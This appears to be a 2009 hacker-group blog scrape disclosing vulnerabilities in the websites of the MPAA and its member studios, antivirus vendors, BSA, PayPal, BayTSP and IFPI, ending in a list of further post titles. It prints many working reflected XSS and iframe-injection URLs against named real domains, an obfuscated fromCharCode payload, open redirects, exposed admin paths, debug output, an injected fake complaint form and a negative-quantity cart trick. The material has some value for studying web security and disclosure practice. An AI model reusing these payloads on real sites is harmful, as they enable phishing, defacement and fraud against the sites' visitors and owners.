http://wiretransfers.net/index.php?page=login&nick=">

http://wiretransfers.net/index.php?page=login&nick=">

Vulnerability that can be used to perform phishing attacks

[so verlibug sucks++++ =))]

/teamelite 2009

You Wouldn't Sue a Search Engine

Sat, 9 May 2009 18:11:51 GMT
We all got used to see useless links on many websites. Links nobody would ever want to click. Look at the following picture:

Someone may ask, "Why are there two searches on MPAA's website? Is there any difference between those 2?"
Searching for "test" ...

So, one search is for movie ratings (as the text says). Let's see what the other one is about. Searching again for "test"...

Interesting results. Let's click on "Full featured example", as a test.

Where is the word we searched for? Interesting address - /test/sitesold/modules/tinymce/tinymce/ - was that supposed to be public? A search for "license" lists license.txt for all installed modules. Searching for "admin" will not list any legal cases involving admins of torrent trackers, you'll get some of their admin pages listed as search results.
Here are some results for some common search keywords:
http://mpaa.org/admin/list.asp
http://mpaa.org/admin/login.asp
http://mpaa.org/admin/_includes/bottonnav.asp
http://mpaa.org/admin/_includes/topnav.asp
http://mpaa.org/temp/researchcontact.asp
http://mpaa.org/fightfilmtheft-new/fft_quiz2.xls
http://mpaa.org/fightfilmtheft-new/quiz_results.xls
http://mpaa.org/copy%20of%20film88exhibita.asp
http://mpaa.org/fightfilmtheft-new/includes/functions.asp
http://mpaa.org/researchenterinfobad.asp
http://mpaa.org/press_releases/dir.txt
http://mpaa.org/copy%20of%20index.asp
http://mpaa.org/index2.asp
http://mpaa.org/fightfilmtheft-new/admin/index.asp
http://mpaa.org/fightfilmtheft-new/en/todo.asp
http://mpaa.org/fightfilmtheft-new/ca/todo.asp
http://mpaa.org/pressreleaseswrong.asp
http://mpaa.org/testfolder/xredcarpet_txtbg%20(1).asp
http://mpaa.org/admin/redcarpetlist.asp
http://mpaa.org/webcaratwo/conversionreport.txt

It looks like the "Search" link is one of those links nobody would ever want to click on that website. Almost any keyword returns results that are not meant to be seen by public. Do you want to find out more about their press releases ? Search for "press releases" to get pressreleaseswrong.asp.
Searching for "thank you" reveals the way MPAA fixes bugs in their website: they don't correct anything, they just rename the vulnerable file. The new name for "thank_you.asp" is: http://mpaa.org/thank_you_old_05_2009_abdferkf324934lkasdf23493243kdfer.asp.

Other search scripts found (using the keyword "search") :
http://mpaa.org/sr.asp
http://mpaa.org/searchresults.asp
http://mpaa.org/flmrat_srchreslts1.asp
http://mpaa.org/flmrat_srchreslts.asp
http://mpaa.org/search_resultindexserver3.asp
http://mpaa.org/search_resultindexserver2.asp
http://mpaa.org/search_resultindexserver1.asp
http://mpaa.org/search_resultindexserver.asp
http://mpaa.org/search_home.asp
http://mpaa.org/searchoriginal.asp
http://mpaa.org/s.asp
http://mpaa.org/flmrat_srchreslts_old.asp
http://mpaa.org/filmratings.asp
http://mpaa.org/copy%20of%20flmrat_srchreslts.asp
http://mpaa.org/cis_flmrat_srchreslts.asp
http://mpaa.org/searchundcons.asp
http://mpaa.org/favoritemovie/inc_search.asp
http://mpaa.org/favoritemovie/inc_index.asp
http://mpaa.org/favoritemovie/inc_filmratings.asp

http://mpaa.org/google-search.asp
http://mpaa.org/google.asp

Their "Google search" is shown as "Google at its best". Sounds interesting. Let's see...

Doing a test search...

Searching for ...

This should be called "XSS at its best".

Multiple Vulnerabilities in MPAA Member Websites

Sun, 10 May 2009 17:43:22 GMT

http://mpaa.org/AboutUsMembers.asp wrote:
The Motion Picture Association of America (MPAA) serves its members from its offices in Los Angeles and Washington, D.C. On its board of directors are the Chairmen and Presidents of the six major producers and distributors of motion picture and television programs in the United States. These members include:

Paramount Pictures Corporation
Sony Pictures Entertainment Inc.
Twentieth Century Fox Film Corporation
Universal City Studios LLLP
Walt Disney Studios Motion Pictures
Warner Bros. Entertainment Inc.

During our tests we found out that all these websites have problems that would allow someone with bad intentions to show illegal content in their name, to infect visitors with malware or to request credit card details from their users.
No automated tools were used for testing, and we used Google for our proof of concept links. Maybe in the near future Google will improve its services to blacklist vulnerable websites as it already does with websites that infect visitors with malware or use browser exploits.

Paramount Pictures Corporation - XSS found by Vektor

http://www.paramount.com/paramount.php?label=%22);%20--%3E%3C/script%3E%3Ccenter%3E%3Cdiv%20id=%22main%22%3E%3Ctable%20cellpspacing=%220%22%20cellpadding=%220%22%20border=%220%22%20width=%22100%%22%3E%3Ctr%3E%3Ctd%20nowrap%20valign=%22top%22%3E%3Ciframe%20style=%22border:%20none%201px;%20width:%20100%;%20height:%20100%;position:absolute;z-order:-1;top:0;%22%20src=%22http://www.google.com%22%20width=%22100%%22%20height=%221000px%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/center%3E%3Cscript%3E%3C!--

Sony Pictures Entertainment Inc. - discloses internal IP, Open redirect found by Vektor, SQL Injection found by Methodman, full path disclosure found by Methodman

http://search2.sonypictures.com/search?output=xml_no_dtd
SQL Injection:

Open redirect: http://www.sonypictures.com/sonystyle/redirect.php?http://www.google.com
Full path disclosure: C:\WebShare\new.columbiatristar.it\Web\cinema\lib\search.inc.php

Twentieth Century Fox Film Corporation - XSS found by Methodman

http://forums.fox.com/n/find/results.asp?webtag=foxsytycd&ctx=search&o=relevance&af=31&be=0&f=this&qu=%22%3E%3Ciframe%20src=%22http://www.google.com%22%3E%3C!--&Go=Search

Universal City Studios LLLP - XSS found by Vektor

http://www.universalstudios.com/contact_form.php?email_id=%5C');%3C/script%3E%3Ciframe%20src=http://google.com%20width=100%%20height=1000px%3E

Walt Disney Studios Motion Pictures - XSS and Open redirect found by Vektor

Open redirect: http://home.disney.go.com/guestservices/disclaimers/redirect?destination=http://www.google.com
XSS (search box - mouse over, edit change): http://disney.go.com/search/index?q=test%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%22%20onmouseover=%22self.location.href='http://www.google.com'%22%20onchange=%22self.location.href='http://www.google.com'

Warner Bros. Entertainment Inc. - XSS and Open redirect by Vektor

Open redirect: http://www2.warnerbros.com/web/all/link/partner.jsp?url=http://www.google.com/

XSS:
http://www.warnerbros.com/?page=movies&pid=f-c1a3c2d2/%22%3E%3C/noscript%3E%3Ciframe%20src=%22http://www.google.com%22%3E
http://www.warnerbros.com/?page=actors&pid=t-ed78ed0c/%22%3E%3C/noscript%3E%3Ciframe%20src=%22http://www.google.com%22%3E
http://www.warnerbros.com/?page=video-games&pid=g-5f3d9fef/%22%3E%3C/noscript%3E%3Ciframe%20src=%22http://www.google.com%22%3E

Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks

Sun, 10 May 2009 21:05:24 GMT
Symantec vs Kaspersky vs Eset-(Nod32) vs AVG vs F-secure vs Trendmicro

hehe...  I know, someone is bored. We have found several bugs in the past few months, always on the same websites.

So now still vulnerable and people still under threat? no doubt !

Symantec.com  - XSS IE only

Code:
https://www.symantec.com/connect/endpoint-management-virtualization/forums}">?sym=">

Altris.com  - XSS and Iframe Injection on search module

why altris? look at this

Code:
https://kb.altiris.com/display/1n/index.asp?c=&cpc=&cid=&cat=&catURL=&r=0.94508

:)proof on concept
Search string
Code:
"

What about this ?

Kaspersky - XSS & Iframe Injection

Code:
https://support.kaspersky.com/en/PersonalCabinet3/Registration/Form/?">

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'">>
XSS

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'">

Works fine also Redirect to other website

Linkscanner.avg.com - Critical XSS

Eset.co.il - Iframe Injection

Code:
http://www.eset.co.il/home/doc.aspx?mCatID=9904&rgid=151&strSearch="

F-secure.com - XSS & Iframe Injection by Vektor

Vulnerable Page
Code:
http://www.f-secure.com/en_EMEA/about-us/contact-us/feedback/

WARNING: This is a proof of concept that proves an XSS bug in f-secure website.

Trendmicro.com - XSS & Iframe Injection

Vulnerable page:
Code:
http://trendmicro.mediaroom.com/index.php?s=">

xss and Iframe injection  on search module
Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage

Multiple Vulnerabilities in BSA.org Website

Mon, 11 May 2009 22:28:11 GMT

http://www.bsa.org/Privacy%20Policy.aspx wrote:
We take strong precautions to protect your data from loss, misuse, unauthorized access or disclosure, alteration, or destruction. When BSA employs subcontractors that may have access to personal information, they are bound by a confidentiality agreement to ensure that they exercise the same level of care when handling your personal information as we do.

http://www.bsa.org/country/Public%20Policy/Security.aspx wrote:
Information transmitted over networks must be secure from thieves and hackers. The success of the global information society is largely dependent upon the faith and trust that users place in the Internet. BSA supports user education about network security and cyber crime.

Some vulnerabilities in bsa.org allow someone with bad intentions to show illegal content in their name, to infect visitors with malware or to request credit card details from their users.

WARNING: The following links and forms are presented as a proof of concept and they don't represent the views of the affected website.

XSS in 404 page: http://www.bsa.org/sitecore/notfound.aspx?item=%2fcountry%2fbsa+and+members/%3C/div%3E%3C/div%3E%3C/div%3E%3Ciframe%20style=%22position:absolute;top:0;left:0;z-order:1;%22%20width=%22100%%22%20height=%221000px%22%20src=%22http://www.google.com%22%3E%2fcontact+bsa&user=extranet%5cAnonymous&site=website

XSS in BSA member registration page (http://w3.bsa.org/requestmemberaccess.cfm) :

Full path disclosure: http://www.bsa.org/geoip
ASP.NET debugging information:
http://www.bsa.org/EmailPage.aspx, click "Send" without completing the form to get ASP.NET debugging information.
Quote:
Server Error in '/' Application.
Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Exception: Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[Exception: Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty]
   Sitecore.Modules.Forms.BaseForm.ExecuteFunction(FunctionInfo function, Control sender, String EventName, EventArgs args) +1059
   Sitecore.Modules.Forms.BaseForm.InvokeEvent(Control sender, String EventName, EventArgs args) +370
   Sitecore.Modules.Forms.BaseForm.ProcessEvent(Object sender, EventArgs e) +112
   Sitecore.Modules.Forms.BaseForm.EventHook(Object sender, EventArgs e) +9
   System.Web.UI.WebControls.Button.OnClick(EventArgs e) +105
   System.Web.UI.WebControls.Button.RaisePostBackEvent(String eventArgument) +107
   System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +7
   System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +11
   System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1746

Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433
http://www.bsa.org/Search%20Results.aspx?search_text=&searchlang=test&x=0&y=0 (view source, search for "SwitchLanguage")
http://www.bsa.org/xsl/BSA%20Search%20Results.xslt
Full path disclosure and debugging info:
https://events.bsa.org/credits.aspx?page=x
https://events.bsa.org/adaview.aspx?pageid=

Update: XSS found in http://www.bsacybersafety.com/ :

PayPal again vulnerable to XSS

Tue, 12 May 2009 15:22:12 GMT
Paypal.com

Registration paypal.com vulnerable to XSS ,Iframe Injection  and Redirect

Vulnerable page:-

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country=

POC:-

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country=">

then CLICK continue

Proof of concept  Video Demonstration

http://www.youtube.com/watch?v=wRYGFomNtz4

PayPal UK MediaCenter - XSS ,Iframe injection and Redirect

Iframe and Redirect on search module.


XSS

Code:
https://www.paypal-press.co.uk/content/default.asp?NewsAreaID=2&LocaleID='">>
XSS

Code:
https://www.paypal-press.co.uk/imagelibrary/detail.asp?MediaDetailsID="'/>

The same problem also on https://www.paypal-press.fr

Paypal Staff has been alerted about this.
Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage

Update: Vulnerabilities in Websites of 6 Antivirus Vendors

Tue, 12 May 2009 20:53:14 GMT
This is an update to our earlier post, Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks.

All Antivirus vendors except Symantec corrected the problems, some of them didn't admit that they had a problem but they all corrected them. From all companies we notified, we got only 1 response from Trend Micro,

Rik_Ferguson wrote:
Hi,
This is Rik from Trend Micro. Just wanted to thank you for highlighting this flaw and to let you know that we had it fixed by 00:27 UTC on the 12th May.
Thanks again for bringing it to our attention.
Best,
Rik Ferguson
Trend Micro

According to The Register, Symantec fixed last month the XSS found by Methodman on their 404 page.

The Register wrote:
Symantec said the reported vulnerability on its site was discovered and fixed last month. "Symantec was notified of a reported security vulnerability on a webpage within Symantec's website back in April," a spokeswoman explained. "Upon notification of the potential vulnerability, Symantec immediately conducted comprehensive testing and fixed the vulnerability. Symantec takes the security of its website very seriously and can confirm that no company or customer information was exposed."

The problem is, the website is still vulnerable to exactly the same XSS they say it was fixed last month and reported 2 days ago. While it doesn't expose customer information, it exposes visitors to phishing attacks. This is a screenshot made today:

Proof of concept link that loads a parody image from http://encyclopediadramatica.com in their 404 page (IE only): https://www.symantec.com/connect/endpoint-management-virtualization/forums")}}document.write(String.fromCharCode(60, 105,109,103,32,115,114,99,61,34,104, 116,116,112,58,47,47,105,109,97,103,101, 115,46,101,110,99,121,99,108,111,112,101,100,105,97,100, 114,97,109,97,116,105,99,97,46,99,111,109,47,105,109,97,103,101,115,47, 97,47,97,50,47,87,104,101,114,101,105,115,121,111,117,114,110,111, 114,116,111,110,110,111,119,46,106,112,103,34,62))

The problem is a java script that is present in almost all pages on their website. A malformed URL redirects to the 404 page which still has that script.

Code:

  Page not found | Symantec Connect


Anything appended to "/forums" is not correctly escaped. Their tests probably failed because only IE unescapes %22's to quotes when the location is relaced by a javascript.

[BayTSP] How to send copyright infringement notices from you to yourself

Wed, 13 May 2009 20:30:12 GMT

http://webreply.baytsp.com/robots.txt wrote:
HTTP Status 404 - /robots.txt

type Status report

message /robots.txt

description The requested resource (/robots.txt) is not available.
Apache Tomcat/5.5.17

No robots.txt file means robots can index and cache everything from their website. And so they did. Almost all their copyright infringement notices can be found with a search engine. Now we know how a copyright infringement notice looks like. The problem is, everyone can see the form and can attempt to respond to copyright infringement claims. There is no IP check and no authentification. There is no way to tell the form was completed by the right person, especially if a proxy was used (anybody can find them with Google and respond to them). Also, users who have some spyware browser toolbars installed (and there are many) may send all clicked links from their e-mails to 3rd parties. In BayTSP's case, a link is all what it takes for anyone with any IP to be able to access a form and users cannot reply to threatening e-mails directly, because the return address is fake.
During a test with a customer ID of 160 and a hash of 11111111111111111111111111111111 (which cannot identify a real complaint), XSS vulnerabilities were found. So anybody can send copyright infringement notices in their name and inject iframes with 3rd party content and redirect the response somewhere else.
The following screenshot demonstrates an XSS attack that injects a poorly formatted fake complaint form (from BayTSP to BayTSP) and an iframe from http://demonoid.com.

WARNING: This is a proof of concept, and it doesn't reflect the views of BayTSP.

</td></tr></table><form style="position:absolute;top:0;left:0" name="compianceform" action="complianceprocess.jsp" method="post"> <BR><BR><BR><BR><BR><BR><BR><BR><BR> <div id="container"><div id="insideContent"><div id="leftNav"><div id="insideMainContent"><div> </div><div id="insideMainContentInside"><table width="600" align="center"><tbody><tr><td align="right"><br /> <b><a style="text-decoration: underline;" href="formhelp.html#noticeid" target="_blank">Infringement Notice ID:</a></b> </td><td align="left" valign="middle"><input type="text" readonly value="31337" name="idcode" disabled></td></tr> <tr><td align="right"><b><a style="text-decoration: underline;" href="formhelp.html#infinfo" target="_blank">Infringement Information:</a></b><br><font color="red" size="1">(ReadOnly)</font> </td><td align="left"><textarea readonly="readonly" rows="10" cols="50">Title: Failure to validate input data Infringement Source: BitTorrent Initial Infringement Timestamp: 2000-01-01 00:00:00 Recent Infringement Timestamp: 3000-01-01 00:00:00 Infringing filename: *.* Infringers IP Address: 68.178.254.204 Infringers DNS name: www.baytsp.net , www.baytsp.com Infringers URL: http://www.baytsp.com
Contact Information:
(ReadOnly) GoDaddy.com, Inc. USA abuse@godaddy.com

Compliance Statement:

Yes. I've complied and removed all copyrighted material for which I'm not the copyright holder from my computer and / or network.

Yes. While the copyrighted material does not reside on our network, we have taken appropriate steps within our area of authority to resolve this issue (For use by ISPs & Universities only)

No. I've not complied.

Mistake. (Please explain below why you feel this is a mistake)

Additional Information:
Optional

Important Note!
It is BayTSP's policy not to request from ISPs or Universities personal information about the alleged infringer. Therefore, BayTSP does not know your personal contact information.

In some instances your internet service provider may terminate your service upon receipt of a copyright infringement notice. In order to prevent your service from being disconnected or to have it reinstated, your ISP may ask for written verification that you have complied.

If you need written verification from BayTSP that you have complied with the infringement notice, have questions or need help in complying, please be sure to include your email address and/or telephone number in the "additional notes" above .

Additionally, please be assured that in providing your contact information to BayTSP, it will be used only to assist you and will be held in the strictest of confidentiality.

I certify that I have provided truthful information.

BayTSP Home | FAQ
c2008 BayTSP, Inc | Phone:408.341.2300 | Toll Free:1.877.922.9877

[IFPI] Can you get paid to read a book ?

Fri, 15 May 2009 21:11:46 GMT
After visiting and reporting vulnerabilities in websites of RIAA, MPAA (1, 2, 3, 4), BSA and BayTSP, it's time to do the same for IFPI.org / IFPI.com / IFPI.co.uk / IFPI.org.uk .

Someone interested in statistics may find their website as an interesting resource - they are selling books with statistics. Too bad the preview pages are broken links (broken links are everywhere on their website, but I wasn't expecting to see them as a marketing strategy).

I want to buy "Full 2009 report" (£550) and "Full 2008 report" (£225).

In fact... I've changed my mind about the 2009 report, it's too expensive. How do I remove it? Let's update Quantity with -1 to remove that item.

Sounds great! I get a book and they pay me £325! Must be some promotional stuff.

Yes, the page is vulnerable to XSS (the text I put there is really irrelevant, I wasn't going to buy anything - the company name I tried: -->
Poll

Which business model do you think is good for us?

>>ENTER<<

Title:		Twilight Zone - The Movie (1983)
Rating:		NC-17
Distributor:		Warner Bros. Inc.

Title:		You Wouldn't Download a Car (1983)
Rating:		G
Distributor:		Musing And Film Industries of America

</td></tr></table><form style="position:absolute;top:0;left:0" name="compianceform" action="complianceprocess.jsp" method="post"> <BR><BR><BR><BR><BR><BR><BR><BR><BR> <div id="container"><div id="insideContent"><div id="leftNav"><div id="insideMainContent"><div> </div><div id="insideMainContentInside"><table width="600" align="center"><tbody><tr><td align="right"><br /> <b><a style="text-decoration: underline;" href="formhelp.html#noticeid" target="_blank">Infringement Notice ID:</a></b> </td><td align="left" valign="middle"><input type="text" readonly value="31337" name="idcode" disabled></td></tr> <tr><td align="right"><b><a style="text-decoration: underline;" href="formhelp.html#infinfo" target="_blank">Infringement Information:</a></b><br><font color="red" size="1">(ReadOnly)</font> </td><td align="left"><textarea readonly="readonly" rows="10" cols="50">Title: Failure to validate input data Infringement Source: BitTorrent Initial Infringement Timestamp: 2000-01-01 00:00:00 Recent Infringement Timestamp: 3000-01-01 00:00:00 Infringing filename: . Infringers IP Address: 68.178.254.204 Infringers DNS name: www.baytsp.net , www.baytsp.com Infringers URL: http://www.baytsp.com
Contact Information: (ReadOnly)	GoDaddy.com, Inc. USA abuse@godaddy.com

Compliance Statement:
	Yes. I've complied and removed all copyrighted material for which I'm not the copyright holder from my computer and / or network.
	Yes. While the copyrighted material does not reside on our network, we have taken appropriate steps within our area of authority to resolve this issue (For use by ISPs & Universities only)
	No. I've not complied.
	Mistake. (Please explain below why you feel this is a mistake)

Additional Information: Optional

Important Note!	It is BayTSP's policy not to request from ISPs or Universities personal information about the alleged infringer. Therefore, BayTSP does not know your personal contact information. In some instances your internet service provider may terminate your service upon receipt of a copyright infringement notice. In order to prevent your service from being disconnected or to have it reinstated, your ISP may ask for written verification that you have complied. If you need written verification from BayTSP that you have complied with the infringement notice, have questions or need help in complying, please be sure to include your email address and/or telephone number in the "additional notes" above . Additionally, please be assured that in providing your contact information to BayTSP, it will be used only to assist you and will be held in the strictest of confidentiality.
I certify that I have provided truthful information.

nemesis.te-home.net

http://www.cromnet.ro Vulnerable to SQL Injection

New plugin for HeXHub: CmdSpy, a plugin that notifies the hub owner about the use / attempt to use o ...

Abdul DC Bot version 1004 released, including new filter plugin.

http://www.goldhost.ro Romanian Hub Hosting XSS Bug

Log with IP changes for Downadup domain list

http://www.romaniairc.org Vulnerable to SQL Injection

http://kinder.lx.ro Vulnerable to SQL Injection

http://linuxdcpp.berlios.de LinuxDC Vulnerable to Cross Site Scripting

http://linuxdcpp.berlios.de LinuxDC Vulnerable to Cross Site Scripting

http://www.realtimeinfo.roo Vulnerable to SQL Injection

SQL Injection Bug On Bitdefender Thailanda Website

VNC Spanish Server Pwned

F-Secure still Not Secure

= Kaspersky still Insecure? =

http://audioannex.com Vulnerable to Remote File Inclusion

http://www.moneytransfer.ie Vulnerable to SQL Injection

Log with IP changes for Downadup domain list, february update

Website Update

Intel Security Center Has NO Security

New Forum

Germanamericanbancorp.com - Vulnerable to xss

Crue.isi.edu - LFI

Sci.nctu.edu.tw - Local File Inclusion

Other Bad Security Settings on Kaspersky's Websites

Forum signatures

HeXHub 5.03

Void passwords

Kaspersky Returns

Spammers spread VKontakte.ru password stealing trojans on DC hubs

HeXHub 5.03a

Hublists Used by DDoS Bots

Microsoft Lottery™ Strikes Again

The451Group - Full Disclosure

Securityspace Redirect

Networkworld Redirect

IRC to NMDC

QSDChublist.com Updated

QSDChublist.com Bugfixes

Telecomsite.nl - SQL iNJECTION

XSS on Worldbank.org

Anewcreditcard.co.uk XSS bug

Wingate - Sql Injection

Unibg.it - LFI

Hubpinger.ro - XSS -Iframe url injection

Clax.ro -SQL Injection

Turnkey Ebook Store v1.1 - XSS + Redirect

Multiple Bugs On EBAY.CO.UK Website

ssnet.ro - XSS

caffedelmar.ro VHC - LFI

Gantep.edu.tr

Rapowder.ch

Metasploit Decloaking Engine and TOR

MaxMind.com - XSS

New Cross site Scripting Vulnerability on kaspersky

Symantec Website Open to XSS Vulnerability

Avanced TOR (Windows only)

DCinfo.org - XSS

Spanish Ebay Vulnerable to XSS

Updates and fixes on QSDChublist.com

Theregister.co.uk - XSS

Netcraft Vulnerable to XSS

XSS by teamelite

">alert(String.fromCharCode(88,83,83))/h1>

technewsworld.com - xss

New XSS Bug on Yahoo

XSS-BY-Methodman

Critical XSS bug in Google Book Search

Hidden installers and "Server 89.exe"

Multiple Bugs on McAfee Websites

MPAA Website Vulnerable to XSS

Bugs in RIAA.com Website

Securitydot website Infected with Trojan Downloader

Faking Movie Ratings

nupecc.org - LFI

Unionemollica.it - LFI

Alfa.hub.lv - LFI

VerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities

VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

You Wouldn't Sue a Search Engine

">/h1>